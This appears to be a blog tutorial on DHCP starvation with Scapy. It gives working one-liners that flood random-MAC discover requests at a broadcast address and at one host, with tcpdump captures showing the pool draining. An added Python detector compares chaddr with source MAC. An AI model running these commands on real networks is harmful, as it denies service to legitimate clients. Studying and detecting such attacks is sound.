DHCP DoS with scapy
* http://funoverip.net/2010/12/dhcp-denial-of-service-with-scapy/
* http://hakipedia.com/index.php/Category:Network_Security
DHCP Denial of Service with scapy by foip on December 9th, 2010
1. Introduction
This is a small post explaining how to run a starvation attack against a DHCP server with only three lines of code (thanks to Scapy!).
Information & download regarding Scapy :
http://www.secdev.org/projects/scapy/
Information about DHCP Starvation attack :
http://hakipedia.com/index.php/DHCP_Starvation
2. Starvation attack with scapy
Running a starvation attack is nothing more than sending a lot of dummy DHCP requests with random source MAC addresses. After a few seconds, there are no more IP addresses available in the pool.
Warning: Don't run this attack against networks you are not authorized to test!
This is to test against a single host (note the newer Scapy version and the dst in the IP packet):
[root@localhost scapy-2.1.0]# ./run_scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.1.0)
>>> conf.checkIPaddr = False
>>> dhcp_request= Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="10.0.8.174")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_request,loop=0)
This is the ATTACK!
[root@host1 ]$ scapy
Welcome to Scapy (v1.1.1 / -)
>>> conf.checkIPaddr = False
>>> dhcp_discover = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover,loop=1)
...............................................................^C
Sent 70 packets.
interesting
To stop the attack, simply press Ctrl+C.
Does it work? Yes, take a look at the following tcpdump captures.
2.1. The DHCP queries:
[root@host2 ]$ tcpdump -n -e -i eth0 port 68
ec:51:e2:20:5b:93 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 64:38:62:38:63:65, length 244
8e:97:0f:18:8a:19 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 39:33:39:37:65:66, length 244
28:a7:45:35:c0:47 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 38:34:66:64:33:63, length 244
…
2.2. Then the DHCP responses:
00:23:20:56:53:f0 > 64:38:62:38:63:65, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.117.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 39:33:39:37:65:66, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.118.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 38:34:66:64:33:63, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.119.68: BOOTP/DHCP, Reply, length 305
…
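The captures above already contain what a defender needs to spot this traffic: in every request the BOOTP chaddr differs from the Ethernet source address. The following detector is an added example, not part of the original post; it parses `tcpdump -n -e` lines in the format shown in 2.1. The function names and the threshold are assumptions, and it assumes a capture taken on the client segment, where an unrelayed request's chaddr normally equals the frame's source MAC.

```python
import re

# First three pairs are the requests from the capture in 2.1; the last one is
# a constructed benign client whose chaddr equals its Ethernet source address.
HDR = (", ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > "
       "255.255.255.255.67: BOOTP/DHCP, Request from ")
SAMPLE = "\n".join(
    f"{src} > ff:ff:ff:ff:ff:ff{HDR}{chaddr}, length 244"
    for src, chaddr in [
        ("ec:51:e2:20:5b:93", "64:38:62:38:63:65"),
        ("8e:97:0f:18:8a:19", "39:33:39:37:65:66"),
        ("28:a7:45:35:c0:47", "38:34:66:64:33:63"),
        ("02:00:00:aa:bb:01", "02:00:00:aa:bb:01"),  # constructed
    ]
)

MAC = r"(?:[0-9a-f]{2}:){5}[0-9a-f]{2}"
LINE_RE = re.compile(
    rf"(?P<src>{MAC}) > ff:ff:ff:ff:ff:ff,.*\.68 > 255\.255\.255\.255\.67: "
    rf"BOOTP/DHCP, Request from (?P<chaddr>{MAC})"
)

def parse_requests(text):
    """Return (ethernet_src, chaddr) pairs for broadcast DHCP client requests."""
    matches = map(LINE_RE.search, text.splitlines())
    return [(m["src"], m["chaddr"]) for m in matches if m]

def is_ascii_hex(mac):
    """True when every chaddr byte is an ASCII hex digit, as in the 2.1 capture
    (0x64 = 'd'), which is what a 12-character hex string in chaddr produces."""
    return all(chr(int(b, 16)) in "0123456789abcdef" for b in mac.split(":"))

def analyse(text, threshold=3):
    """Flag starvation indicators; threshold is an assumed tuning value."""
    reqs = parse_requests(text)
    spoofed = sorted({c for s, c in reqs if s != c})
    return {
        "requests": len(reqs),
        "mismatched_chaddr": spoofed,
        "ascii_hex_chaddr": sorted(c for c in spoofed if is_ascii_hex(c)),
        "alert": len(spoofed) >= threshold,
    }

if __name__ == "__main__":
    print(analyse(SAMPLE))
```

The same source-MAC versus chaddr comparison is what DHCP snooping's MAC address verification enforces on switches that support it, so the check can be applied at the access port rather than only in a capture.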
3. The End
Hope you enjoy.